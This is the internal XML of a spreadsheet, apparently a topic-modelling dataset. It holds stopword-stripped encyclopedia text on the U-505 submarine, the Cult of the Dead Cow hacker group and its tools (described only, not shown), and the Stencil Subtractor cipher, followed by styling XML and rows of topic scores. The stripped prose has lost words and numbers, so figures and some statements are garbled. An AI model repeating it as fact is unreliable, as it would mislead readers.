submerged, boat could operate nautical miles (117 knots (7.4 km/h; mph); surfaced, could travel 13,450 nautical miles (24,910 15,480 knots km/h; mph). u-505 fitted 53.3 torpedo tubes (four fitted stern), torpedoes, 10.5 (4.13 c/32 naval gun, rounds, (1.5 c/30 well (0.79 c/30 anti-aircraft gun. boat complement forty-eight. service history u-505's keel laid june 1940 deutsche werft hamburg, germany yard number 295. launched 1941 commissioned august kapitänleutnant axel-olaf loewe command. september 1942, loewe relieved kptlt. peter zschech. october 1943, oberleutnant paul meyer took command weeks relieved november oblt.z.s. harald lange, commanded boat capture june 1944.she conducted patrols career, sinking eight ships totaling 45,005 gross register tons (grt). three american, british, norwegian, dutch, colombian. first patrol u-505 assigned operational boat u-boat flotilla february 1942, following training exercises u-boat flotilla august 1941 january 1942. began first patrol kiel january still formally undergoing training. days, circumnavigated british isles docked lorient occupied france february. engaged enemy vessels attacked. second patrol u-505 left lorient february 1942 second patrol. days, traveled west coast africa sank first vessels. less month, u-505 sank four ships: british benmohr, norwegian sydhav, american west irmo, dutch alphacca total 25,041 grt. april, u-505 attacked allied aircraft mid-atlantic suffered little damage. third patrol u-505 began third patrol june 1942, leaving home port lorient. sank american ships thrush thomas mckean colombian urious caribbean sea. urious sailing ship belonging colombian diplomat, sinking gave colombia political grounds declare germany. u-505 returned lorient august days patrol without attacked. fourth patrol u-505's fourth patrol sent northern coast south america. left lorient october sank british vessel ocean justice coast venezuela november. november near trinidad, u-505 surprised surface lockheed hudson maritime patrol aircraft squadron, royal force, made low-level attack, landing (110 bomb directly deck water level. explosion killed watch officer wounded another conning tower. also tore anti-aircraft mounting severely damaged ship's pressure hull. aircraft fragmentation bomb's explosion crashed ocean near u-505, killing raaf pilot flight sergeant ronald sillcock entire crew. with pumps inoperative water flooding engine room several places, kptlt. zschech ordered crew abandon ship, technical staff (led chief petty officer otto fricke) insisted trying save her. vessel made water-tight almost weeks repair work. after sending wounded watch officer supply submarine ("milk cow") u-462, u-505 limped back lorient reduced power. aborted patrols after months lorient repairs, u-505 started fifth patrol. left lorient july 1943 returned days, attack three british destroyers stalked hours. while u-505 badly damaged encounter, return france repairs. u-505's next four patrols aborted days sea, equipment failure sabotage french dockworkers working resistance. faults found included sabotaged electrical radar equipment, hole deliberately drilled diesel fuel tank, faulty welds parts repaired french workers. this happened many times became butt jokes throughout base lorient. upon returning botched patrol crew found sign painted docking area reading: "u-505's hunting ground". time many u-boats sunk, u-505's commander, kptlt. zschech, overheard another u-boat commander joke, "there commander always come back zschech." tenth patrol zschech's suicide after months lorient, u-505 departed tenth atlantic patrol, seeking break luck morale. british destroyers spotted east azores october 1943, long crossing biscay, forced submerge endure severe depth-charge attack. zschech committed suicide submarine's control room, shooting head front crew. first watch officer paul meyer took command returned boat port minimal damage. meyer "absolved blame" kriegsmarine incident. zschech recorded submariner commit suicide underwater response stress prolonged depth charging. eleventh patrol zschech replaced commander oblt.z.s. harald lange. u-505's eleventh patrol began christmas 1943. returned early lorient january 1944, rescued thirty-three crew members german torpedo boat t25, sunk december british cruisers biscay.u-505 took part wolfpack hela december 1943 january 1944. twelfth patrol capture anti-sub task force allies learned decrypted german messages u-boats operating near cape verde, exact locations. navy dispatched task group 22.3 area, hunter-killer group commanded captain daniel gallery. 22.3 consisted escort aircraft carrier guadalcanal destroyer escorts pillsbury, pope, flaherty, chatelain, jenks commander frederick hall. group sailed norfolk, virginia 1944 began searching u-boats area late may, using high-frequency direction-finding fixes ("huff-duff") surface reconnaissance. detection attack 11:09 june 1944, 22.3 made sonar (asdic) contact u-505 21°30′n 19°20′w, (280 coast oro, yards (700 chatelain's starboard bow. escorts immediately moved towards contact, guadalcanal moved away speed launched grumman wildcat fighter join another wildcat grumman avenger torpedo bomber already airborne.chatelain close u-505 depth charges would sink fast enough intercept u-boat, fired hedgehog anti-submarine mortars passing submarine turning make follow-up attack depth charges. aircraft sighted u-505 fired water mark position chatelain dropped depth charges. immediately detonation charges, large slick spread water fighter pilot radioed: "you struck oil! surfacing!" less seven minutes chatelain's first attack began, badly damaged submarine surfaced less metres (700 away. chatelain immediately opened fire available weapons, joined ships task force wildcats.lange believed u-505 seriously damaged ordered crew abandon ship. they obeyed order promptly, scuttle boat; opened valves left engines running. rudder damaged depth charges, submarine circled clockwise approximately knots km/h; mph). commanding officer chatelain submarine turning toward ship thought attack, ordered single torpedo fired torpedo missed, passing ahead abandoned u-505. salvage operations chatelain jenks collected survivors eight-man party pillsbury albert david came alongside submarine boat entered conning tower. they found body signalman first class gottfried fischer deck, fatality combat, u-505 deserted. they secured charts codebooks, closed scuttling valves, disarmed demolition charges. they stopped water coming submarine remained afloat, although water stern, also stopped engines. u-boat researcher derek waller written german crewman, ewald felix, helped foil scuttling attempt.pillsbury attempted take submarine repeatedly collided move away three compartments flooded. second boarding party guadalcanal rigged towline aircraft carrier u-boat. guadalcanal's chief engineer commander earl trosino joined salvage party. disconnected submarine's diesels electric driving motors leaving clutched propeller shafts. with u-boat moving guadalcanal, propellers "windmilled" passed water, turning shafts drive motors. this caused motors electrical generators charging batteries. with power batteries, u-505's pumps cleared water attempted scuttling, compressors blew ballast tanks, bringing full surface trim.despite capture taking place close french morocco, casablanca known infiltrated german spies thus another safe port needed house submarine. after three days towing, guadalcanal transferred u-505 fleet abnaki. june, submarine entered great sound, site united states navy's naval operating base well royal naval dockyard, darrell's island, royal naval station bermuda), bermuda, 1,700 nautical miles (3,150 1,960 mi). navy took prisoners u-505, three wounded. crew interned camp ruston, near ruston, louisiana. secrecy important mission submarine's flag kept personal care commander chief atlantic fleet duration war. awards chief naval operations admiral ernest king considered court-martialling captain gallery towed u-505 instead sinking capturing code books. submarine's crewmen isolated prisoners war, cross denied access them. kriegsmarine finally declared crew dead informed families effect, crew returned 1947.ltjg albert david received medal honor leading boarding party, time awarded atlantic fleet sailor world torpedoman's mate third class arthur knispel radioman second class stanley wdowiak first follow david submarine, received navy cross. seaman first class earnest james beaver received silver star commander trosino received legion merit. captain gallery conceived executed operation, received navy distinguished service medal. task group awarded presidential unit citation. admiral royal ingersoll, commander chief, atlantic fleet, cited task group "outstanding performance anti-submarine operations eastern atlantic" stated feat unprecedented individual group bravery, execution, accomplishment naval history united states". final journey navy kept u-505 naval operating base bermuda, navy intelligence officers engineers studied intensively. maintain illusion sunk rather captured, painted look like submarine renamed nemo. europe, used promote bond sales part "mighty 7th" loan drive. anyone purchased bond could also purchase ticket board inspect her. june 1945, visited york city, philadelphia, baltimore. captain gallery present opening exhibition washington, d.c. navy u-505 war. experts thoroughly examined bermuda, moored derelict portsmouth navy yard, navy decided target gunnery torpedo practice sank. 1946, rear admiral gallery, opposed navy's plans u-505, told brother father john gallery plan, father john contacted president lenox lohr chicago's museum science industry (msi) would interested museum already planned display submarine, acquisition u-505 seemed ideal. government donated submarine museum september 1954, chicago residents raised $250,000 transporting installing boat. coast guard tugboats cutters towed boat great lakes, making stop detroit, michigan, july 1954. museum dedicated september 1954 permanent exhibit memorial sailors lost lives first second battle atlantic. museum ship nearly every removable part stripped boat's interior time went museum; condition serve exhibit, museum director lohr asked replacements german manufacturers supplied boat's original components parts. admiral gallery reports autobiography eight bells all's well every company supplied requested parts without charge. most included letters effect manufacturers wanted credit german technology.a reunion held museum 1964, years ship's capture, gallery returned lange binoculars ship belonged him.the navy removed periscope placed water tank used research arctic submarine laboratory point loma, california; demolished 2003 found navy donated museum displayed along submarine. 2004, u-boat's exterior suffered noticeable damage weather, museum moved climate-controlled location april 2004. they restored reopened public june 2005.in 2019, museum science industry refurbished submarine, restoring closer original condition. also, special exhibit many additional artifacts opened general admission section museum. popular culture captain gallery recounted capture u-505 1951 memoir clear decks. gary moore recounts story captured crew 2006 non-fiction book playing enemy. hans goebeler recounts story boat's patrols crew 2005 memoir steel boats, iron hearts: u-boat crewman's life aboard u-505. summary raiding history also wartime captured german u-boats german submarine u-110 (1940) german submarine u-570, later graph german submarine u-559 german submarine u-744 german submarine u-1024 surviving german u-boats german submarine u-534 german submarine u-995 german submarine u-2540 other list submarine museums playing with enemy u-571 references bibliography foster, kevin july 1988). "national register historic places registration: u-505 (ixc u-boat)" (pdf). national park service. retrieved september 2012. "accompanying photos" (pdf). national park service. retrieved september 2012. gallery, daniel (1958). captured u-boat. london: popular book company. gallery, daniel (1978). u-505. york: warner books. isbn 0-446-32012-9 external links u-505 msichicago.org u-505 uboatarchive.net helgason, guðmundur. "u-505". uboat.net. retrieved march 2010. u-505 hnsa ship (archived) short film away boarders available free download internet archive. panel discussion, pritzker military library, february 2013, u-505 moderated john allen williams panelists marc milner, stephen budiansky kurt haunfelner u-505 personal diary. worldcat. oclc 51730895. oberfunkmatt gottfried fischer's personal diary</t>
  </si>
  <si>
    <t>Cult of the Dead Cow</t>
  </si>
  <si>
    <t>cult dead cow, also known communications, computer hacker media organization founded 1984 lubbock, texas. group maintains weblog site, also titled "cult dead cow". media released first blog, also features thoughts opinions group's members. timeline group formed june 1984 farm slaughterhouse grandmaster ratte' (aka swamp ratte'), franken gibe, vicious, three sysops. 1980s cult dead organized maintained loose collective affiliated bbss across canada. time credited coining term "31337" alternative spelling "eleet" "elite", expression denoting skill greatness person, place, thing. december 1990, member drunkfux pseudonym jesse dryden, jefferson airplane drummer spencer dryden grand nephew charlie chaplin gave birth modern hacker con. hohocon, usually held houston, texas, first hacker conference invited participation journalists enforcement. all, hosted five annual hohocons. 1991, named "sassiest underground computer group" sassy magazine. also 1991, group began distributing music form cassette tape albums sold post office box. many albums available online entirety. october 1994 creation cdc's usenet newsgroup, alt.fan.cult-dead-cow. thus first hacking group usenet newsgroup. november year, group claimed responsibility giving ronald reagan alzheimer's disease, claiming done 1986 blowgun. declared church scientology 1995 alt.religion.scientology controversy, stating believe hubbard [sic] actually none heinrich himmler fled argentina responsible stealing babies hospitals raising 'super-soldiers' purpose overthrowing u.s. fed. govt. bloody revolution. fear plans 'fourth reich' established home soil vise-like grip oppression known scientology! 1997, began distributing original mp3-format music website.in august 1998, presented popular back orifice tool february 2000, subject 11-minute documentary short titled "disinformation". also february 2000, member mudge briefed president bill clinton internet security. communications communications parent organisation cult dead cow, three groups fall communications. ninja strike force hacktivismo. ninja strike force 1996, announced birth ninja strike force, group "ninja" dedicated achieving goals cdc, intervention task force online offline. opened dojo 2004. "nsf dojo" member also operates streaming radio station, features recordings hacker presentations educational programming addition wide range musical styles artists. membership granted individuals stand support ideals. members recognized abilities, capabilities, best best skills. 2006 ninja strike force launched microsite. hacktivismo late 1999, created hacktivismo, independent group communications umbrella dedicated creation anti-censorship technology furtherance human rights internet. group's beliefs described fully hacktivismo declaration, seeks apply universal declaration human rights international covenant civil political rights internet. among hacktivismo's beliefs include access information basic human right. organization partially shares critical ensemble's (cae) belief value secrecy, challenges many hacktivists subject civil disobedience. model instead, disruptive compliance. disruptive, case, refers disruptive technology; compliance refers back internet original intent constructive free-flow openness. hacktivismo also authored software license agreement, hacktivismo enhanced-source software license agreement, source available (but open source). their work focuses development software empowers conduct forbidden repression, rather enabling (private public) attacks repressors. general hopes open code become lingua franca hacktivism seeks wage peace, war. while term used, software described cdc's "waging peace internet" would create connections dissidents sound technoliberationist terms, rhizomatic. crossover associations groups addition obvious associations cult dead cow, hacktivismo, ninja strike force, also crossover associations several organizations. these include l0pht; founding members white knight count zero final members dildog mudge members cdc. additionally, nightstalker member youth international party line/technology assistance program. lord digital, founders mindvox, former member lod/h current member sacrament transition. knight member masters deception. also, man, member ninja strike force, founders acid productions. another member, mark hinge, founding member british hacker group syndicate london. flack, another ninja strike force member, co-founder horror "lit group" soulz zero. mudge later went program manage cinder program darpa, aimed detect 'insider threats' like wikileaks sources. electronic publication during 1980s, well known throughout scene underground ezine, also called cult dead cow,. group claims invented ezine. cult dead credited coining term "elite" used hacker scene/computer underground textfiles 1980s.the ezine criticism group years; 1994 episode geraldo entitled "computer vice," geraldo rivera referred group bunch sickos" published article called "sex satan," originally published 1988. hacktivism 1996, member omega used term "hacktivism" email group members. group active hacktivist causes since time. hong kong blondes late 1990s, claimed worked group chinese dissidents called "the hong kong blondes." group’s ostensible goal disrupt computer networks within people's republic china order allow citizens access censored content online. hong kong blondes were, ostensibly, first hacktivist groups, though group's existence actions proven invented fiction. first spoke group publicly presentation 1997 beyond hope conference held puck building york city. members claimed advised group strong encryption techniques. formally severed ties hong kong blondes december 1998. 2015, former member oxblood ruffin claimed without evidence hacking activities attributed hong kong blondes invention intended create diversion cover extraction several chinese pro-democracy activists. asked group white house meeting february 2000 organized national security advisor richard clarke president bill clinton, mudge admitted made up." cyberwar january 1999, joined international coalition hackers denounce call cyberwar governments china iraq. milošević trial when questioning patrick ball international crimes tribunal 2002, slobodan milošević asked ball relationship cdc. ball given talk member cdc-sponsored panel hacktivism 2001. goolag campaign early 2006, launched "goolag" play gulag, soviet forced labour camps) campaign response google's decision comply china's internet censorship policy censor search results mainland-chinese version search engine. campaign consists primarily parody google's logo reads "goolag: exporting censorship, search time." group encouraged readers make t-shirts merchandise donate proceeds sale human rights china. students free tibet held anti-google rally dharamsala, india february 2006, employing logo variety ways. issued press release campaign, wherein described microsoft, yahoo!, google, cisco "gang four" respective policies compliance beijing government's internet policies. united states congress also called issue release. this press release, originally entitled "congress jerks off, gang four reach raincoats," picked many news sources, abbreviated version distributed (with altered title "cult dead (cdc) launches campaign against internet censorship china"). tools released several tools, hackers/system administrators general public. many related computer security sometimes dubbed "hacker tools". automated prayer project automated prayer project, written javaman, vt420 connected ultra5 serial cable displays output continuously running program. signaling rate limited 9600 baud. program cycles rosary, displaying individual prayer every thirty seconds. each individual prayer sent random machine internet random port." back orifice back orifice (often shortened computer program designed remote system administration. enables user control computer running microsoft windows operating system remote location. name microsoft backoffice server software. program debuted august 1998. brainchild dystic. according group, purpose demonstrate lack security microsoft's operating system windows back orifice 2000 back orifice 2000 (often shortened bo2k) computer program similar function back orifice. back orifice 2000 debuted july 1999 original code written dildog. whereas original back orifice limited windows windows operating systems, bo2k also supports windows windows windows 2000. some bo2k client functionality also implemented *nix-systems. addition, bo2k released gpl. 2012, bo2k actively developed. camera/shy camera/shy first hacktivismo project released. debuted 2002 h.o.p.e. convention york city. steganographic tool scans delivers decrypted content directly world wide web. nbname nbname computer program used carry denial-of-service attacks disable netbios services windows machines. written dystic released july 2000 convention vegas. scatterchat scatterchat encrypted instant messaging client based gaim. written salvatore testa released h.o.p.e. number conference york city july 2006. provides encryption well integrated onion routing tor, secure file transfers. various flaws software elaborated researchers. six/four system six/four system censorship-resistant network proxy written mixter, member hacktivismo. works using "trusted peers" relay network connections encrypted links. hacktivismo gained notoriety 2003 six/four system became first product hacker group receive approval united states department commerce export strong encryption. smbrelay smbrelay2 smbrelay smbrelay2 computer programs used carry man-in-the-middle attacks windows machines. they written dystic released march 2001 @lantacon convention atlanta, georgia. torpark xerobank browser (formerly known torpark) variant portable firefox browser built torpark intended portable media flash drive also used hard disk drive. cdc/hacktivismo co-released v.1.5.0.7 along steve topletz september 2006. whisker whisker project authored rain forest puppy longer development. checked thousands known security vulnerabilities servers. whisker version co-released 2000. also 2600: hacker quarterly chaos computer club deadbeef h.o.p.e. legion doom masters deception operation cybersnare phrack notes references external links official website</t>
  </si>
  <si>
    <t>Stencil Subtractor</t>
  </si>
  <si>
    <t>stencil subtractor frame ciphered text recyphering tool invented british army intelligence officer cryptographer john tiltman ready trial april 1941 adopted officially british forces march 1942, brought service june 1943. used together subtractor tables, placed table numerical values visible gaps frame used encipher underlying numerical code (such office cipher, cipher naval cipher etc.). references</t>
  </si>
  <si>
    <t>Topic</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>개수</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SUM</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</si>
</sst>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맑은 고딕"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="맑은 고딕"/>
      <family val="2"/>
      <charset val="129"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
      <charset val="129"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
      <charset val="129"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="5">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>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2">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="4">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0" xfId="3" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="2" applyAlignment="1"/>
  </cellXfs>
  <cellStyles count="4">
    <cellStyle name="20% - 강조색6" xfId="1" builtinId="50"/>
    <cellStyle name="40% - 강조색6" xfId="2" builtinId="51"/>
    <cellStyle name="60% - 강조색6" xfId="3" builtinId="52"/>
    <cellStyle name="표준"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7933"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="D1" workbookViewId="0">
      <selection activeCell="K2" sqref="K2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="17" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="8" max="8" width="8.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.45">
      <c r="B1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A2" s="1">
        <v>0</v>
      </c>
      <c r="B2">
        <v>0</v>
      </c>
      <c r="C2">
        <v>0</v>
      </c>
      <c r="D2">
        <v>0</v>
      </c>
      <c r="E2">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2" t="s">
        <v>7</v>
      </c>
      <c r="G2" t="s">
        <v>8</v>
      </c>
      <c r="H2" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A3" s="1">
        <v>1</v>
      </c>
      <c r="B3">
        <v>7035</v>
      </c>
      <c r="C3">
        <v>7035</v>
      </c>
      <c r="D3">
        <v>0</v>
      </c>
      <c r="E3">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3" t="s">
        <v>7</v>
      </c>
      <c r="G3" t="s">
        <v>10</v>
      </c>
      <c r="H3" t="s">
        <v>11</v>
      </c>
      <c r="V3" s="3" t="s">
        <v>15692</v>
      </c>
      <c r="W3" s="3" t="s">
        <v>15693</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A4" s="1">
        <v>2</v>
      </c>
      <c r="B4">
        <v>7034</v>
      </c>
      <c r="C4">
        <v>7034</v>
      </c>
      <c r="D4">
        <v>0</v>
      </c>
      <c r="E4">
        <v>0.77340000867843628</v>
      </c>
      <c r="F4" t="s">
        <v>7</v>
      </c>
      <c r="G4" t="s">
        <v>12</v>
      </c>
      <c r="H4" t="s">
        <v>13</v>
      </c>
      <c r="V4" s="2">
        <v>0</v>
      </c>
      <c r="W4" s="2">
        <f>COUNTIF(D:D,V4)</f>
        <v>1983</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A5" s="1">
        <v>3</v>
      </c>
      <c r="B5">
        <v>2022</v>
      </c>
      <c r="C5">
        <v>2022</v>
      </c>
      <c r="D5">
        <v>0</v>
      </c>
      <c r="E5">
        <v>0.59560000896453857</v>
      </c>
      <c r="F5" t="s">
        <v>7</v>
      </c>
      <c r="G5" t="s">
        <v>14</v>
      </c>
      <c r="H5" t="s">
        <v>15</v>
      </c>
      <c r="V5" s="2">
        <v>1</v>
      </c>
      <c r="W5" s="2">
        <f t="shared" ref="W5:W8" si="0">COUNTIF(D:D,V5)</f>
        <v>845</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A6" s="1">
        <v>4</v>
      </c>
      <c r="B6">
        <v>2024</v>
      </c>
      <c r="C6">
        <v>2024</v>
      </c>
      <c r="D6">
        <v>0</v>
      </c>
      <c r="E6">
        <v>0.77730000019073486</v>
      </c>
      <c r="F6" t="s">
        <v>7</v>
      </c>
      <c r="G6" t="s">
        <v>16</v>
      </c>
      <c r="H6" t="s">
        <v>17</v>
      </c>
      <c r="V6" s="2">
        <v>2</v>
      </c>
      <c r="W6" s="2">
        <f t="shared" si="0"/>
        <v>2290</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A7" s="1">
        <v>5</v>
      </c>
      <c r="B7">
        <v>7032</v>
      </c>
      <c r="C7">
        <v>7032</v>
      </c>
      <c r="D7">
        <v>0</v>
      </c>
      <c r="E7">
        <v>0.50389999151229858</v>
      </c>
      <c r="F7" t="s">
        <v>7</v>
      </c>
      <c r="G7" t="s">
        <v>18</v>
      </c>
      <c r="H7" t="s">
        <v>19</v>
      </c>
      <c r="V7" s="2">
        <v>3</v>
      </c>
      <c r="W7" s="2">
        <f t="shared" si="0"/>
        <v>1687</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A8" s="1">
        <v>6</v>
      </c>
      <c r="B8">
        <v>5987</v>
      </c>
      <c r="C8">
        <v>5987</v>
      </c>
      <c r="D8">
        <v>0</v>
      </c>
      <c r="E8">
        <v>0.85559999942779541</v>
      </c>
      <c r="F8" t="s">
        <v>7</v>
      </c>
      <c r="G8" t="s">
        <v>20</v>
      </c>
      <c r="H8" t="s">
        <v>21</v>
      </c>
      <c r="V8" s="2">
        <v>4</v>
      </c>
      <c r="W8" s="2">
        <f t="shared" si="0"/>
        <v>1127</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A9" s="1">
        <v>7</v>
      </c>
      <c r="B9">
        <v>2027</v>
      </c>
      <c r="C9">
        <v>2027</v>
      </c>
      <c r="D9">
        <v>0</v>
      </c>
      <c r="E9">
        <v>0.97009998559951782</v>
      </c>
      <c r="F9" t="s">
        <v>7</v>
      </c>
      <c r="G9" t="s">
        <v>22</v>
      </c>
      <c r="H9" t="s">
        <v>23</v>
      </c>
      <c r="V9" s="4" t="s">
        <v>15694</v>
      </c>
      <c r="W9" s="4">
        <f>SUM(W4:W8)</f>
        <v>7932</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A10" s="1">
        <v>8</v>
      </c>
      <c r="B10">
        <v>7037</v>
      </c>
      <c r="C10">
        <v>7037</v>
      </c>
      <c r="D10">
        <v>0</v>
      </c>
      <c r="E10">
        <v>0.85470002889633179</v>
      </c>
      <c r="F10" t="s">
        <v>7</v>
      </c>
      <c r="G10" t="s">
        <v>24</v>
      </c>
      <c r="H10" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A11" s="1">
        <v>9</v>
      </c>
      <c r="B11">
        <v>2031</v>
      </c>
      <c r="C11">
        <v>2031</v>
      </c>
      <c r="D11">
        <v>0</v>
      </c>
      <c r="E11">
        <v>0.65539997816085815</v>
      </c>
      <c r="F11" t="s">
        <v>7</v>
      </c>
      <c r="G11" t="s">
        <v>26</v>
      </c>
      <c r="H11" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A12" s="1">
        <v>10</v>
      </c>
      <c r="B12">
        <v>2033</v>
      </c>
      <c r="C12">
        <v>2033</v>
      </c>
      <c r="D12">
        <v>0</v>
      </c>
      <c r="E12">
        <v>0.99059998989105225</v>
      </c>
      <c r="F12" t="s">
        <v>7</v>
      </c>
      <c r="G12" t="s">
        <v>28</v>
      </c>
      <c r="H12" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A13" s="1">
        <v>11</v>
      </c>
      <c r="B13">
        <v>7029</v>
      </c>
      <c r="C13">
        <v>7029</v>
      </c>
      <c r="D13">
        <v>0</v>
      </c>
      <c r="E13">
        <v>0.66170001029968262</v>
      </c>
      <c r="F13" t="s">
        <v>7</v>
      </c>
      <c r="G13" t="s">
        <v>30</v>
      </c>
      <c r="H13" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A14" s="1">
        <v>12</v>
      </c>
      <c r="B14">
        <v>7023</v>
      </c>
      <c r="C14">
        <v>7023</v>
      </c>
      <c r="D14">
        <v>0</v>
      </c>
      <c r="E14">
        <v>0.98869997262954712</v>
      </c>
      <c r="F14" t="s">
        <v>7</v>
      </c>
      <c r="G14" t="s">
        <v>32</v>
      </c>
      <c r="H14" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A15" s="1">
        <v>13</v>
      </c>
      <c r="B15">
        <v>2039</v>
      </c>
      <c r="C15">
        <v>2039</v>
      </c>
      <c r="D15">
        <v>0</v>
      </c>
      <c r="E15">
        <v>0.53789997100830078</v>
      </c>
      <c r="F15" t="s">
        <v>7</v>
      </c>
      <c r="G15" t="s">
        <v>34</v>
      </c>
      <c r="H15" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.45">
      <c r="A16" s="1">
        <v>14</v>
      </c>
      <c r="B16">
        <v>7022</v>
      </c>
      <c r="C16">
        <v>7022</v>
      </c>
      <c r="D16">
        <v>0</v>
      </c>
      <c r="E16">
        <v>0.96249997615814209</v>
      </c>
      <c r="F16" t="s">
        <v>7</v>
      </c>
      <c r="G16" t="s">
        <v>36</v>
      </c>
      <c r="H16" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A17" s="1">
        <v>15</v>
      </c>
      <c r="B17">
        <v>2041</v>
      </c>
      <c r="C17">
        <v>2041</v>
      </c>
      <c r="D17">
        <v>0</v>
      </c>
      <c r="E17">
        <v>0.70319998264312744</v>
      </c>
      <c r="F17" t="s">
        <v>7</v>
      </c>
      <c r="G17" t="s">
        <v>38</v>
      </c>
      <c r="H17" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A18" s="1">
        <v>16</v>
      </c>
      <c r="B18">
        <v>7018</v>
      </c>
      <c r="C18">
        <v>7018</v>
      </c>
      <c r="D18">
        <v>0</v>
      </c>
      <c r="E18">
        <v>0.38850000500679022</v>
      </c>
      <c r="F18" t="s">
        <v>7</v>
      </c>
      <c r="G18" t="s">
        <v>40</v>
      </c>
      <c r="H18" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A19" s="1">
        <v>17</v>
      </c>
      <c r="B19">
        <v>2032</v>
      </c>
      <c r="C19">
        <v>2032</v>
      </c>
      <c r="D19">
        <v>0</v>
      </c>
      <c r="E19">
        <v>0.99379998445510864</v>
      </c>
      <c r="F19" t="s">
        <v>7</v>
      </c>
      <c r="G19" t="s">
        <v>42</v>
      </c>
      <c r="H19" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A20" s="1">
        <v>18</v>
      </c>
      <c r="B20">
        <v>5993</v>
      </c>
      <c r="C20">
        <v>5993</v>
      </c>
      <c r="D20">
        <v>0</v>
      </c>
      <c r="E20">
        <v>0.39550000429153442</v>
      </c>
      <c r="F20" t="s">
        <v>7</v>
      </c>
      <c r="G20" t="s">
        <v>44</v>
      </c>
      <c r="H20" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A21" s="1">
        <v>19</v>
      </c>
      <c r="B21">
        <v>2016</v>
      </c>
      <c r="C21">
        <v>2016</v>
      </c>
      <c r="D21">
        <v>0</v>
      </c>
      <c r="E21">
        <v>0.91269999742507935</v>
      </c>
      <c r="F21" t="s">
        <v>7</v>
      </c>
      <c r="G21" t="s">
        <v>46</v>
      </c>
      <c r="H21" t="s">
        <v>47</v>
